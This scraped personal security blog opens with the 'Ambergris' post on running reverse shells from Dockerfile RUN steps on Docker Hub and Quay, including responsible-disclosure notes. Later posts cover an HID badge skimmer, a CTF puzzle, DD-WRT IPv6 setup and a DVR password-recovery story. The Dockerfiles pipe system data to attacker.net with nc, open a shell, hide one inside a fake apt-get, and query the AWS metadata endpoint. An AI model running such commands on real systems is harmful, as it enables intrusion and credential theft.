shell in the Dockerfile.\nDocker First, let me start with a very brief description of Docker. If you are already familiar with Docker you should skip to the next section.\nDocker is an open-source project that automates the creation of environments for Linux applications inside software containers.\nDocker containers wrap up a piece of software in a complete filesystem that contains everything it needs to run: code, runtime, system tools, system libraries - anything you can install on a server. This guarantees that it will always run the same, regardless of the environment it is running in.\nDocker vs. Virtual Machines Unlike Traditional virtual machines Docker images do not contain the entire OS, just the libraries and resources needed by the application.\nVIRTUAL MACHINES: Virtual machines include the application, the necessary binaries and libraries, and an entire guest operating system \u0026ndash; all of which can amount to tens of GBs\nCONTAINERS: Containers include the application and all of its dependencies \u0026ndash; but share the kernel with other containers, running as isolated processes in user space on the host operating system. Docker containers are not tied to any specific infrastructure: they run on any computer, on any infrastructure, and in any cloud.\nDockerfile The Dockerfile is a set of instructions executed by docker to build an image which can later be run. Below is an example Dockerfile which after being built can be run to print Hello World to stdout.\nFROM debian ENV MESSAGE \u0026#34;Hello World\u0026#34; RUN echo \u0026#34;$MESSAGE\u0026#34; \u0026gt; /message.txt CMD cat /message.txt The RUN command in a Dockerfile runs when docker is building the image. CMD or ENTRYPOINT run when the image is being run. Typically all setup for the image is performed in RUN commands while the application the image is being built for starts with the CMD command.\nDocker Hub Docker Hub is a cloud-based registry service which allows you to link to code repositories, build your images and test them, store manually pushed images, and links to Docker Cloud so you can deploy images to your hosts. It provides a centralized resource for container image discovery, distribution and change management, user and team collaboration, and workflow automation throughout the development pipeline.\nEverything should be in the cloud right? ☁\nContainer Lifecycle $ docker build Create a container on from a Dockerfile $ docker pull Pull a pre-built image from the Docker Hub $ docker run Runs a prebuilt container Can also build or pull a container if it does not exist locally\u0026hellip; Ambergris A reverse shell inside your Dockerfile\nSo, what would happen if we put a reverse shell in a Dockerfile using RUN commands? Below is a Dockerfile I created to test just that.\nFROM busybox ENV POC_HOST attacker.net ENV POC_PORT 1337 RUN echo \u0026#34;Please NEVER build this image!\u0026#34; RUN (echo \u0026#34;== UNAME ==\u0026#34;; uname -a) | nc $POC_HOST $POC_PORT RUN (echo \u0026#34;== ID ==\u0026#34;; id) | nc $POC_HOST $POC_PORT RUN (echo \u0026#34;== IP ==\u0026#34;; ip a) | nc $POC_HOST $POC_PORT RUN (echo \u0026#34;== DMESG ==\u0026#34;; dmesg) | nc $POC_HOST $POC_PORT RUN nc $POC_HOST $POC_PORT -e /bin/sh CMD sh This Dockerfile sends our server located at attacker.net the output of uname, id, ip a, dmesg, and finally, a reverse shell.\nLocal Builds In order to test this, build this local image, replacing attacker.net with your own domain. And have a shell listener on port 1337.\ndocker build . Even though the user runs the reverse shell as root, it is not a fully privileged root. You are running as root inside a Docker container. You have uid=0, gid=0, but some system level privileges may not be present like NET_ADMIN preventing you from putting the network interface into promiscuous mode. Additionally you will have a virtual network adapter behind a virtual NAT on the host and a different root file-system.\nAlternatively the image can be built locally from a remote source such as GitHub!\ndocker build github.com/lanrat/ambergris This will have the same effect as the local Dockerfile above. However, in this scenario the Dockerfile containing the reverse shell is not saved on the image building system allowing the user to see what commands they are running. This can be just as dangerous as pipe to sh.\nRemote Builds Docker Hub What if we send our \u0026ldquo;backdoored\u0026rdquo; Dockerfile to the Docker Hub to be built? Well, not surprisingly it is built! And as part of the building process the reverse shell is run!\nThe Docker Hub is not the only cloud image building service in town, QUAY is another, let\u0026rsquo;s test it!\nAnother shell!\nBuild Environment Both Docker Hub and QUAY run on AWS. So the shells we get are inside a Docker container on an AWS instance.\nDocker Hub Hardware 2.50GHz Intel Xeon CPU 4GB Ram 40GB HD space Can read host dmesg kernel stack traces of host Apparmor rules networking information vpn info limited information on previous containers built Limits execution time to 2 hours QUAY Hardware 2.40GHz Intel Xeon CPU x2 4GB Ram 50GB HD space Can read host dmesg kernel stack traces of host Apparmor rules networking information limited information on previous containers built Limits execution time to 1 hour automatically runs 3 times! Both the official Docker Hub and QUAY have similar environments and limits on build execution time. Like in a normal Docker container the dmesg command will return information about the host system which may contain sensitive information.\nWhat can I do with this anyways? You basically get a free AWS instance that reboots every 1-2 hours with no persistent storage. But with a few clever hacks these limitations can be overcome.\nExample usages:\nMine Bitcoin Send spam Botnet Tor node Password cracking Proxy Obfuscation Even if you view the Dockerfile of an image before you build it, it is still possible to end up with a reverse shell on your system. Examine the following example:\nFROM lanrat/base RUN apt-get install myapp CMD myapp Looks safe right? Not so fast\u0026hellip;\nSuppose the Dockerfile for lanrat/base contained the following:\nFROM debian ENV POC_HOST attacker.net ENV POC_PORT 1337 RUN echo \u0026#34;Please NEVER build this image!\u0026#34; RUN echo -e \u0026#39;#!/bin/sh \\nnc $POC_HOST $POC_PORT -e /bin/sh\u0026#39; \u0026gt; /usr/bin/apt-get RUN chmod +x /usr/bin/apt-get CMD sh This effectively replaces the apt-get command with a reverse shell. So when the image using lanrat/base is built it calls apt-get thinking it is going to install myapp but it really starts a reverse shell.\nThis can be taken a step further by having the fake apt-get command pass its arguments to the real apt-get and fork the reverse shell to the background. As the image would appear to be built successfully it may go unnoticed, but every time it is built, or even run, the attacker\u0026rsquo;s code may run.\nRunning Inside AWS Both the Docker Hub and Quay use AWS to build the Docker images. This means that the shell you get inside a Dockerfile when building on one of these services is inside the AWS infrastructure.\nI found that within this environment Docker containers being build can make requests to the AWS Instance Metadata API. This API may leak information such as access tokens, usernames/passwords for API/infrastructure and configuration details. The AWS Instance Metadata API is accessible by making HTTP requests to the IP address 169.254.169.254. For Example:\ncurl http://169.254.169.254/latest/user-data The Docker hub had very little information accessible from this API but QUAY had a more of their environment\u0026rsquo;s configuration including usernames, keys, and access tokens accessible.\nTakeaways Know where your image comes from Know where your base image\u0026rsquo;s base image comes from Understand that docker build is just as dangerous as docker run with untrusted images Block access to the AWS Instance Metadata API if you allow users to make HTTP requests from your infrastructure Disclosure Docker 8/29/16 - My initial disclosure 8/29/16 - Response acknowledging potential vulnerability. Informed me that each Docker build is performed on a fresh VM 8/30/16 - AWS Instance Metadata API blocked from within Docker build environment QUAY (CoreOS) 8/30/16 - My initial disclosure 8/30/16 - Response acknowledging as expected behavior. 8/30/16 - I provided example of data leaking on the AWS Instance Metadata API 8/30/16 - Removed sensitive data from AWS Instance Metadata API Bonus Video ","permalink":"https://lanrat.com/posts/ambergris/","summary":"\u003cp\u003eFor those of you not in the know, ambergris is defined as:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003ea wax-like substance that originates as a secretion in the intestines\nof the sperm whale, found floating in tropical seas and used in perfume manufacture.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"Photo of Whale Barfing\" loading=\"lazy\" src=\"/posts/ambergris/images/whale-barf.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eHowever, that will not be what this post is about (sorry to disappoint). Instead, I\u0026rsquo;ll present what happens when building an image on Docker that contains a reverse shell in the \u003ccode\u003eDockerfile\u003c/code\u003e.\u003c/p\u003e","title":"Ambergris"},{"content":"A while ago I came into possession of a few HID iClass readers. After collecting dust in my project drawer for a few months I decided to find a fun use for them, which ended up in the project I call Badgy.\nBackground The back of the HID readers have 10 colored wires coming out of them. Luckily the readers also had a nice sticker telling me which wire was what.\nThe readers are nice enough to accept a wide range of input voltages to function from 5v - 16v. The readers speak the Wiegand protocol which is a simple and well documented protocol for sending bits over a wire.\nWiegand Overview\nTwo Data lines (data0 \u0026amp; data1) Default to line high (~5v) Falling edge represents a single bit Variable bit length Test badges use 35 bits Noise can easily add extra bits on the line Use a well insulated wire Error checking can be implemented at a higher level if desired CRC or parity bit I started off using an Arduino Wiegand library to read raw data from the card to prove the readers worked correctly. This allowed to me investigate the other non-Wiegand and power lines going into the reader. In short, the extra pins allow you to override the LED light color, beeper, and test the infra-red tamper sensor status (more on that later).\nCard Code Format The test badges I had use the Corporate 1000 data format. This format is used by most buildings that use the HID access cards. The format specifies parity bits, organization ID, and badge ID.\nMy test badges contain a 35 bit long code. The bit order for each organization can also be randomized for additional security via obscurity. With a large enough sample set of badges, identifying the bits that represent the organization ID can be trivial. (they will be the bits that are the same on all scanned badges for the same organization). The rest are for the individual badge ID and any parity bits used.\nEncryption The RFID information going between the physical badge and reader is encrypted, but the reader to the wire inside the wall is plain-text. The encryption keys used for the badge reader can be set by the organization that implements them, however most use the default keys from the factory.\nThis is not due to security negligence, but for functionality reasons. The badges and readers can only operate on a single key. So if two organizations, A and B, occupy the same building on different floors with a shared elevator system that requires a badge scan to operate, both organizations will need to use the same keys to allow both sets of employees to operate the elevator. Now suppose that organization B has another office somewhere else in the world and employees regularly travel between the offices. They want this office to use the same key to allow their employees to use one badge for all their buildings. If this second location is shared with organization C, then organization C will also need to use the same keys. So now organization C and A will be using the same keys even though they may not share any buildings. This can easily expand to hundreds or more organizations as each organization adds new offices and expands globally.\nCloning a physical badge (beyond the scope of this post) will require the private encryption key. The private key is stored in the HID reader in order to decrypt the response from the badge. Previous work has already been done to extract this key.\nReplay Now that the protocol and pins for the HID badge scanner are understood I wanted to see if it would be possible to use a micro-controller to emulate the reader to inject previously scanned badges into the system allowing a potential adversary access to a facility they have a badge code for but lack the physical badge at the time of entry.\nThe threat model here is the adversary has the ability to get the badge data but is unable to physically get the badge. Perhaps they scanned it while standing next to the victim on a crowded bus or by bumping into them on the street.\nFor this attack I used the same Arduino I used to read badges in the Background section but modified it so that the Arduino sends a pre-saved badge to whatever it is connected to. I could now send badge codes from one Arduino to another using one Arduino as a badge reader and another as the badge emulator.\nThe controller Arduino has no way to differentiate between the real HID reader and the Arduino acting as an emulated reader. In theory this will also work with the actual HID controller /access system, but unfortunately I do not have one to test on.\nAll is not lost, HID as thought of this and added a tamper line to the HID reader to detect someone disconnecting the HID reader, which is located on the outside of the secured perimeter. On the HID readers I tested, the tamper line is connected to an IR sensor located on the back of the reader next to an IR LED. The IR light bounces off a reflective sticker on the back of the mounting plate to detect if the reader is ever removed from the mounting plate.\nHowever, this only applies to removing the sensor from the wall the way is was designed to be removed. If removed in what will likely be a more destructive way, it would be possible to access the tamper lines without triggering the tamper sensor allowing an adversary to connect into the line injecting their own \u0026ldquo;tamper OK\u0026rdquo; signal while disconnecting the real HID reader and connecting their micro-controller undetected. From here they can replay any collected badge codes or even attempt brute forcing access codes.\nBuilding the Badge Collector In order to easily collect as many badge codes as possible I wanted to create a self-contained badge reader. The badge reader should be self-powered, and have the ability to save collected badges to persistent storage on itself and ideally offer a means to transmit them wirelessly to a receiver nearby. I was able to accomplish all this and more with a Raspberry Pi zero and USB battery pack.\nThe wiring is as simple as connecting the data0 \u0026amp; data1 Wiegand pins to two of the GPIO pins of the Raspberry Pi, and connecting the 5v output of the USB battery pack to the power inputs of both the Pi and HID reader.\nThe Raspberry Pi runs headless Debian and a program that can be found on GitHub that listens for incoming badge codes and saves them to a log file on the Pi\u0026rsquo;s SD card.\nWireless Data Exfiltration So far this badge collector will work great if hung next to an unsuspecting door. Employees are likely to scan badges to see if they will have access to this newly \u0026ldquo;secured\u0026rdquo; area. But if someone discovers it and removes the reader, what then? Aside from loosing the hardware, all the collected badge access codes are gone. Or are they?\nThe little known PiFm library allows Raspberry Pis to transmit over FM by bit-banging FM over GPIO pin 7. Using this we can convert the log data to audio using espeak and then send it to the FM transmitter provided by PiFm. All we need to do is attach a wire to GPIO Pin 7 to act as the antenna.\nWith this addition, every time a badge is scanned the data is logged to the Pi\u0026rsquo;s SD card and transmitted over FM where a nearby FM recorded can make a backup of the badge data.\nDemo ","permalink":"https://lanrat.com/posts/badgy/","summary":"\u003cp\u003eA while ago I came into possession of a few HID iClass readers. After collecting dust in my project drawer for a few months I decided to find a fun use for them, which ended up in the project I call \u003ca href=\"https://github.com/lanrat/badgy\"\u003eBadgy\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"background\"\u003eBackground\u003c/h2\u003e\n\u003cp\u003eThe back of the HID readers have 10 colored wires coming out of them. Luckily the readers also had a nice sticker telling me which wire was what.\u003c/p\u003e","title":"Badgy"},{"content":"CertGraph crawls SSL certificates to map domain relationships through certificate alternate names. The tool builds a directed graph where domains are nodes and certificate alternative names create edges between related domains.\nThe program performs hostname enumeration by following certificate relationships, revealing domain connections that may not be apparent through traditional DNS enumeration. It outputs data in various formats including graphical representations for network topology analysis.\n","permalink":"https://lanrat.com/projects/certgraph/","summary":"\u003cp\u003eCertGraph crawls SSL certificates to map domain relationships through certificate alternate names. The tool builds a directed graph where domains are nodes and certificate alternative names create edges between related domains.\u003c/p\u003e\n\u003cp\u003eThe program performs hostname enumeration by following certificate relationships, revealing domain connections that may not be apparent through traditional DNS enumeration. It outputs data in various formats including graphical representations for network topology analysis.\u003c/p\u003e","title":"CertGraph"},{"content":"A collection of proof-of-concept exploits demonstrating critical vulnerabilities in ImageMagick (CVE-2016-3714 through CVE-2016-3717). These vulnerabilities allow remote code execution, server-side request forgery, file deletion, and local file disclosure through maliciously crafted image files.\nThe project provides test scripts and example payloads to help developers and security researchers understand the attack vectors and implement proper mitigations. The vulnerabilities affect web applications using ImageMagick or related libraries for image processing, making this a significant security concern for many web services.\n","permalink":"https://lanrat.com/projects/imagetragick/","summary":"\u003cp\u003eA collection of proof-of-concept exploits demonstrating critical vulnerabilities in ImageMagick (CVE-2016-3714 through CVE-2016-3717). These vulnerabilities allow remote code execution, server-side request forgery, file deletion, and local file disclosure through maliciously crafted image files.\u003c/p\u003e\n\u003cp\u003eThe project provides test scripts and example payloads to help developers and security researchers understand the attack vectors and implement proper mitigations. The vulnerabilities affect web applications using ImageMagick or related libraries for image processing, making this a significant security concern for many web services.\u003c/p\u003e","title":"ImageTragick"},{"content":"Last week at DerbyCon 5.0 the CircleCityCon folks had a booth with a challenge, the Challenge of Tiamat\u0026rsquo;s Eye.\n@CircleCityCon: Can you solve the Puzzle of Tiamat\u0026#39;s Eye? Visit our booth at @DerbyCon to take the challenge! pic.twitter.com/yJzPvxOQk9\n\u0026mdash; CircleCityCon 10.0: WHODUNIT? (@CircleCityCon) September 26, 2015 The challenge consisted of the small chest pictured above containing an eye made up of blinking red LEDs. Every 30 seconds the pattern would reset. The content organizers hinted that we would need to record the eye at 60fps in order to capture all of the information we needed. We ended up using a coffee creamer cup as a diffuser over the LEDs to make the difference in the pixels clearer. This resulted in the following recording. Note: we recorded 30 seconds at 60fps, which resulted in a 60 second 30fps recording.\nNext we extracted each frame from the video with the following command: (ffmpeg would have worked as well too)\navconv -i VID_20150926_175956.mp4 -r 30 frames/%5d.webp\nThis resulted in the following 1800 frames.\nAfter viewing the image thumbnails we observed that the shortest amount of time the LED was either on or off was 3 frames. This means that every 3 frames represents a single bit. Since on some frames the LED was half-light we decided to sample every 3rd frame starting in the middle of each bit to get the best representation.\n#! /usr/bin/env python import os from PIL import Image import sys def main(): i = 0 # because os.walk is not sorted, and I\u0026#39;m lazy # ls frames/* \u0026gt; frames.list for l in open(\u0026#34;frames.list\u0026#34;): i+=1 if i % 3 == 0: im = Image.open(l.strip()) # sample pixel location r,g,b = im.getpixel((1357,657)) if (r\u0026gt;250): sys.stdout.write(\u0026#39;1\u0026#39;) else: sys.stdout.write(\u0026#39;0\u0026#39;) print \u0026#34;\u0026#34; if __name__ == \u0026#34;__main__\u0026#34;: main() The python script above reads every 3rd frame and prints out a 0 or 1 depending on the LED state. This gave us the following binary string.\n0101010101111111111001100110100110100110011100101001110011100111010010011101001001101111100110110010011011111001100011100110000110011101001001100101100111010010011010001001100101100110100010011011111001110101100111001110011001011001101111100110011010011000101001100101100110000110011100101001101010100110010110011100111001110100100110010110011100101001110111100110100110011011101001110011100110000110011001101001110010100110010110011001011001100011100011001110011101001001101001100110001110011010111001100101100111010000000000000000000000000000000000000000000 Our first guess was to convert it to ASCII, however that did not return anything intelligible. Another vague hint provided got us thinking it was 10 bit serial data. A quick search on Google led us to Asynchronous Serial Communication, which after removing the first 20 bits for the header, tells us that there is 8 data bits padded by a start and stop bit. Splitting the binary into 10 bit lines and then removing the first and last bit provided us with the following binary.\n01100110 01101001 01110010 01110011 01110100 01110100 01101111 01101100 01101111 01100011 01100001 01110100 01100101 01110100 01101000 01100101 01101000 01101111 01110101 01110011 01100101 01101111 01100110 ... Converting this to ASCII returns the following text.\nfirsttolocatethehouseofbearjesterwinsafreec3ticket After adding a few spaces says:\nfirst to locate the house of bear jester wins a free c3 ticket\nwhich was the magic phrase to say to the house of bear to solve the challenge and win CircleCityCon tickets.\nThree worthy adventurers have solved the mystery of the Eye of Tiamat @sid_tracker @lanrat @ryatesm Congrats! pic.twitter.com/O0vMFNiCeb\n\u0026mdash; CircleCityCon 10.0: WHODUNIT? (@CircleCityCon) September 27, 2015 The puzzle was fun and simple enough to solve in a few hours allowing us to enjoy the rest of DerbyCon. I would like to end by thanking CircleCityCon for creating the challenge and my teammates @SID_tracker and @ryatesm for assisting me in solving the challenge.\nAll of the data used can be found in This Gist.\n","permalink":"https://lanrat.com/posts/solving-tiamats-eye/","summary":"\u003cp\u003eLast week at \u003ca href=\"https://www.derbycon.com/\"\u003eDerbyCon 5.0\u003c/a\u003e the \u003ca href=\"https://circlecitycon.com/\"\u003eCircleCityCon\u003c/a\u003e folks had a booth with a challenge, the Challenge of Tiamat\u0026rsquo;s Eye.\u003c/p\u003e\n\u003cblockquote class=\"twitter-tweet\"\u003e\u003cp lang=\"en\" dir=\"ltr\"\u003e\u003ca href=\"https://twitter.com/CircleCityCon?ref_src=twsrc%5Etfw\"\u003e@CircleCityCon\u003c/a\u003e: Can you solve the Puzzle of Tiamat\u0026#39;s Eye?  Visit our booth at \u003ca href=\"https://twitter.com/DerbyCon?ref_src=twsrc%5Etfw\"\u003e@DerbyCon\u003c/a\u003e to take the challenge!   \u003ca href=\"http://t.co/yJzPvxOQk9\"\u003epic.twitter.com/yJzPvxOQk9\u003c/a\u003e\u003c/p\u003e\u0026mdash; CircleCityCon 10.0: WHODUNIT? (@CircleCityCon) \u003ca href=\"https://twitter.com/CircleCityCon/status/647770152772182016?ref_src=twsrc%5Etfw\"\u003eSeptember 26, 2015\u003c/a\u003e\u003c/blockquote\u003e\n\u003cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"\u003e\u003c/script\u003e\n\n\n\u003cp\u003eThe challenge consisted of the small chest pictured above containing an eye made up of blinking red LEDs. Every 30 seconds the pattern would reset. The content organizers hinted that we would need to record the eye at 60fps in order to capture all of the information we needed. We ended up using a coffee creamer cup as a diffuser over the LEDs to make the difference in the pixels clearer. This resulted in the following recording. Note: we recorded 30 seconds at 60fps, which resulted in a 60 second 30fps recording.\u003c/p\u003e","title":"Solving the Challenge of Tiamat's Eye"},{"content":"Sonic (my home ISP) offers an IPv6 tunnel for their customers who have a service plan that does not offer native IPv6 yet. Sonic\u0026rsquo;s IPv6 tunnel operates much the same way Hurricane Electric\u0026rsquo;s Tunnel Broker does, however since the endpoint is located inside the ISP you should get better performance. Sonic even offers example configurations for configuring the IPv6 tunnel endpoint on various operating systems, but none for DD-WRT, a common aftermarket router firmware. Another Sonic user did document how to configure Sonic\u0026rsquo;s IPv6 tunnel with older versions of DD-WRT on the Sonic forums at dev-random.me, however the link appears to be dead. Additionally newer versions of DD-WRT have a new IPv6 tab which should allow for a painless configuration using nothing more than the web interface.\nConfiguring the Modem The first step is to put your modem into bridged mode. My modem was a Pace 5268AC. Bridged mode can be enabled by opening the modem\u0026rsquo;s configuration page at http://192.168.42.1/ and then going to Settings -\u0026gt; Broadband -\u0026gt; \u0026ldquo;Link Configuration\u0026rdquo; and at the bottom of the page deselect the check-box next to Routing and click save. You may need to reboot your router or have it renew its IP address from Sonic at this time. I initially attempted to configure an IPv6 tunnel using DMZplus, however, in this mode the modem does not forward IP protocol 41 which is needed by the IPv6 tunnel to the DMZ host. Additionally I found that when pinging your WAN IP over the Internet the modem would respond to the ping, as well as forward the ping request to the DMZ host as well, resulting in duplicate ping responses.\nConfiguring Sonic The next step is to request a static IP address from Sonic if you have not done so already. This can be done from the members portal at \u0026ldquo;Internet Connections\u0026rdquo; -\u0026gt; \u0026ldquo;Fusion IP Configuration\u0026rdquo;. After this step you will likely need to enter the new static IP setting in your router to regain connectivity. Once that is done you are ready to request an IPv6 tunnel from Labs -\u0026gt; \u0026ldquo;IPv6 Tunnels\u0026rdquo;. Then select \u0026ldquo;View/Request Tunnel\u0026rdquo; to refresh the page with your tunnel information. Remember to enter your external static IP you were assigned from the previous page. This should show you your IPv6 Transport and Network addresses and subnets. Take note of these.\nNow select \u0026ldquo;View Example Configuration\u0026rdquo;. You should now see the following 4 IP address: sonic-side v4 address, customer-side v4 address, Sonic-side transport IP, and customer-side transport IP.\nTake note of all 4 of these IPs, as well as the Transport and Network from the previous page.\nConfiguring your DD-WRT router Open your DD-WRT router\u0026rsquo;s configuration page (usually http://192.168.1.1) and go to Setup -\u0026gt; IPv6. If you do not have a IPv6 tab then you are likely running an older build of DD-WRT before the web interface got IPv6 support. I\u0026rsquo;m running r27506 but other builds should work just as well. From this page, first enable IPv6 and click save, this should make the page reload with all of the options. You want to use a \u0026ldquo;6in4 Static Tunnel\u0026rdquo;, with a prefix length of 60.\nStatic DNS 1 \u0026amp; 2 Sonic\u0026rsquo;s DNS servers do not have an IPv6 address (that I know of) so I used Google\u0026rsquo;s public DNS servers 2001:4860:4860::8888 and 2001:4860:4860::8844 for Static DNS 1 \u0026amp; 2.\nAssigned / Routed Prefix should be the Network subnet from the previous page without the /60 at the end. So if your network is 2001:05a8:aaaa:bbbb:0000:0000:0000:0000/60 enter 2001:05a8:aaaa:bbbb::. :: is not a typo, it is an abbreviation used in IPv6 address notation for 0 bits.\nRouter IPv6 Address should be left blank, DD-WRT should automatically use the correct value.\nTunnel Endpoint IPv4 Address should be the \u0026ldquo;sonic-side v4 address\u0026rdquo; you took note of before. For me it was 208.201.234.221, but you may have a different value.\nTunnel Client IPv6 Address should be the \u0026ldquo;customer-side transport IP\u0026rdquo; from the Sonic example configuration page. The bitmask should be /127, however my build of DD-WRT has maxlength=2 set on form field. Editing the DOM directly and removing this limitation allows you to successfully enter 127.\nMTU should be set to 0 to allow DD-WRT to automatically determine the correct value.\nRadvd should be enabled.\nWhen you are done your IPv6 configuration page should look like this:\nClick Save, then Apply, and then reboot the router. If everything is correct DD-WRT should show an IPv6 addresses in the upper right corner and should offer global IPv6 addresses to computers on the network.\nFixing ICMPv6 (PING) By default DD-WRT blocks incoming IPv6 pings to your computers on your network. If you want to be able to ping individual computers on your network over the Internet, add the following firewall rule to DD-WRT under Administration -\u0026gt; Commands.\nip6tables -I FORWARD 3 -p icmpv6 --icmpv6-type echo-request -j ACCEPT After saving and applying you should be able to ping your computer\u0026rsquo;s global IPv6 address from any other IPv6 host on the Internet.\nEnabling Modem Access The big downside of putting your modem into bridged mode is that you can no longer access its configuration page. Some people don\u0026rsquo;t care about this, but I like it as it allows me to see my current connection rate and transmission errors. Bridge mode does not mean you need to loose modem access. With another firewall rule you can regain access to the modem\u0026rsquo;s configuration page. In DD-WRT under Administration -\u0026gt; Commands save the following line as the startup script:\nifconfig `nvram get wan_ifname`:0 192.168.42.2 netmask 255.255.255.0 And add the following line to the router\u0026rsquo;s firewall script:\niptables -t nat -I POSTROUTING -o `nvram get wan_ifname` -j MASQUERADE These rules give DD-WRT a second IP of 192.168.42.2 which allows routing to the same subnet the modem is on. After saving, applying and rebooting visiting http://192.168.42.1 should bring the modem\u0026rsquo;s configuration page back up. It should look something like this:\nSuccess If everything went well you should have a fully functional IPv6 tunnel to your home network. You can verify this by using test-ipv6.com or ipv6-test.com.\n","permalink":"https://lanrat.com/posts/sonic-ipv6-tunnel-with-dd-wrt/","summary":"\u003cp\u003e\u003ca href=\"https://www.sonic.com/\"\u003eSonic\u003c/a\u003e (my home ISP) offers an IPv6 tunnel for their customers who have a service plan that does not offer native IPv6 yet. Sonic\u0026rsquo;s IPv6 tunnel operates much the same way \u003ca href=\"https://www.he.net/\"\u003eHurricane Electric\u0026rsquo;s\u003c/a\u003e \u003ca href=\"https://tunnelbroker.net/\"\u003eTunnel Broker\u003c/a\u003e does, however since the endpoint is located inside the ISP you should get better performance. Sonic even offers example configurations for configuring the IPv6 tunnel endpoint on various operating systems, but none for \u003ca href=\"https://www.dd-wrt.com/\"\u003eDD-WRT\u003c/a\u003e, a common aftermarket router firmware. Another Sonic user did document how to configure Sonic\u0026rsquo;s IPv6 tunnel with older versions of DD-WRT on the Sonic \u003ca href=\"https://forums.sonic.net/viewtopic.php?f=13\u0026amp;amp;t=720\"\u003eforums\u003c/a\u003e \u003ca href=\"https://www.dev-random.me/ddwrt-ipv6-6n4-sonicnet/\"\u003eat dev-random.me\u003c/a\u003e, however the link appears to be dead. Additionally newer versions of DD-WRT have a new IPv6 tab which should allow for a painless configuration using nothing more than the web interface.\u003c/p\u003e","title":"Sonic IPv6 Tunnel with DD-WRT"},{"content":"I gave a presentation at WOOT 2015 demonstrating how network enabled telematic control units (TCUs) can be used to remotely control automobiles from arbitrary distance over SMS or the Internet.\nAbstract Modern automobiles are complex distributed systems in which virtually all functionality, from acceleration and braking to lighting and HVAC, is mediated by computerized controllers. The interconnected nature of these systems raises obvious security concerns and prior work has demonstrated that a vulnerability in any single component may provide the means to compromise the system as a whole. Thus, the addition of new components, and especially new components with external networking capability, creates risks that must be carefully considered.\nIn this paper we examine a popular aftermarket telematics control unit (TCU) which connects to a vehicle via the standard OBD-II port. We show that these devices can be discovered, targeted, and compromised by a remote attacker and we demonstrate that such a compromise allows arbitrary remote control of the vehicle. This problem is particularly challenging because, since this is aftermarket equipment, it cannot be well addressed by automobile manufacturers themselves.\nYou can read the full paper.\nUpdate I also gave this talk at ToorCon 2015! See the full talk recording below!\nToorCon 2015 Talk Demo Video CVEs CVE-2015-2906 CVE-2015-2907 CVE-2015-2908 Vulnerability Note: VU#209512\nPress WIRED: Hackers Cut a Corvette\u0026rsquo;s Brakes Via a Common Car Gadget KPBS: Car Hacking Research Accelerates At UC San Diego Engadget: Hackers control connected cars using text messages The Verge: Researchers wirelessly hack a Corvette\u0026rsquo;s brakes using an insurance dongle Business Insider: Hackers have figured out how to take over the brakes in some cars with a simple text message Gizmodo: Small Wireless Car Devices Allow Hackers to Take Control of a Vehicle\u0026rsquo;s Brakes ","permalink":"https://lanrat.com/posts/fast-and-vulnerable/","summary":"\u003cp\u003eI gave a presentation at \u003ca href=\"https://www.usenix.org/conference/woot15/workshop-program/presentation/foster\"\u003eWOOT 2015\u003c/a\u003e demonstrating how network enabled telematic control units (TCUs) can be used to remotely control automobiles from arbitrary distance over SMS or the Internet.\u003c/p\u003e\n\u003ch2 id=\"abstract\"\u003eAbstract\u003c/h2\u003e\n\u003cp\u003eModern automobiles are complex distributed systems in which virtually all functionality, from acceleration and braking to lighting and HVAC, is mediated by computerized controllers. The interconnected nature of these systems raises obvious security concerns and prior work has demonstrated that a vulnerability in any single component may provide the means to compromise the system as a whole. Thus, the addition of new components, and especially new components with external networking capability, creates risks that must be carefully considered.\u003c/p\u003e","title":"Fast and Vulnerable: A Story of Telematic Failures"},{"content":"Recently there has been a lot of buzz about the recent Heartbleed vulnerability found in some versions of OpenSSL. The attack works due to a mistake in the server validating part of the request made by the SSL client. The popular web comic XKCD has made a great simple comic explaining how the attack works, and there are simple tools to test for vulnerable servers.\nBut how does this affect me, a user?\nWell, if any of the services you used were vulnerable, you should at least change your password. Ideally the administrators of the service are aware of this attack and have fixed the issue on their end, and hopefully revoked their previous SSL certificate and issued a new one. If they have not, then you should really consider moving your data elsewhere.\nFor the web, most web browsers will automatically check for revoked certificates and warn the user if they try to visit a site that is using a certificate that has been revoked. However, Google Chrome, currently the most popular web browser, does not check if a server\u0026rsquo;s certificate has been revoked by default. Safari, Firefox, and even Internet Explorer do perform this check by default. But don\u0026rsquo;t worry, CRL (certificate revocation list) checking can be enabled!\nTo enable CRL checking in Chrome enter chrome://settings into the address bar and press enter. Once on the settings page, enter \u0026ldquo;ssl\u0026rdquo; into the search box. Finally check the box next to \u0026ldquo;Check for server certificate revocation\u0026rdquo;. That\u0026rsquo;s all!\nTo verify that certificate revocation checking works, you can visit https://www.cloudflarechallenge.com. If the page loads then your browser is not checking for revoked certs. If you see an error, then your browser noticed that the certificate being used on the server has been revoked and is doing its job.\nMore information about how the Heartbleed attack affects certificates can be found in this CloudFlare blog post.\nUpdate Enabling CRL checking is good, but it is not a full solution. CRL does not work on large scales, to learn more read this.\n","permalink":"https://lanrat.com/posts/enable-server-certificate-revocation-checking-in-chrome/","summary":"\u003cp\u003eRecently there has been a lot of buzz about the recent \u003ca href=\"https://heartbleed.com/\"\u003eHeartbleed\u003c/a\u003e vulnerability found in some versions of OpenSSL. The attack works due to a mistake in the server validating part of the request made by the SSL client. The popular web comic XKCD has made a great simple comic \u003ca href=\"https://xkcd.com/1354/\"\u003eexplaining how the attack works\u003c/a\u003e, and there are \u003ca href=\"https://filippo.io/Heartbleed/\"\u003esimple tools\u003c/a\u003e to test for vulnerable servers.\u003c/p\u003e\n\u003cp\u003eBut how does this affect me, a user?\u003c/p\u003e","title":"PSA: Enable server certificate revocation checking in Chrome"},{"content":"At an internship I had a while ago one project assigned to me was to regain access to a CCTV security system which we had been locked out of for some years. (The previous manager left without leaving the password.)\nThe DVR system was a TRIPLEX DVRLink DVR468RW, whatever that is. It seemed cheap; a small embedded computer with video in/out, a hard-drive and CD-RW drive for recording storage. The administration interface was accessed either by a web server running on the device or a desktop client you installed on your computer.\nMy initial thought was to remove the device\u0026rsquo;s internal clock battery to reset the password back to the default of \u0026ldquo;1234\u0026rdquo;, no dice. Next on the list of things to try was examining the hard-drive in a desktop computer to see if the password could be viewed or reset. The hard drive had a single partition with some old surveillance video footage; nothing to do with settings or authentication. Further examination of the main board revealed a flash memory chip which I assumed stored the device\u0026rsquo;s configuration, including the administration password.\nLet me step back here… 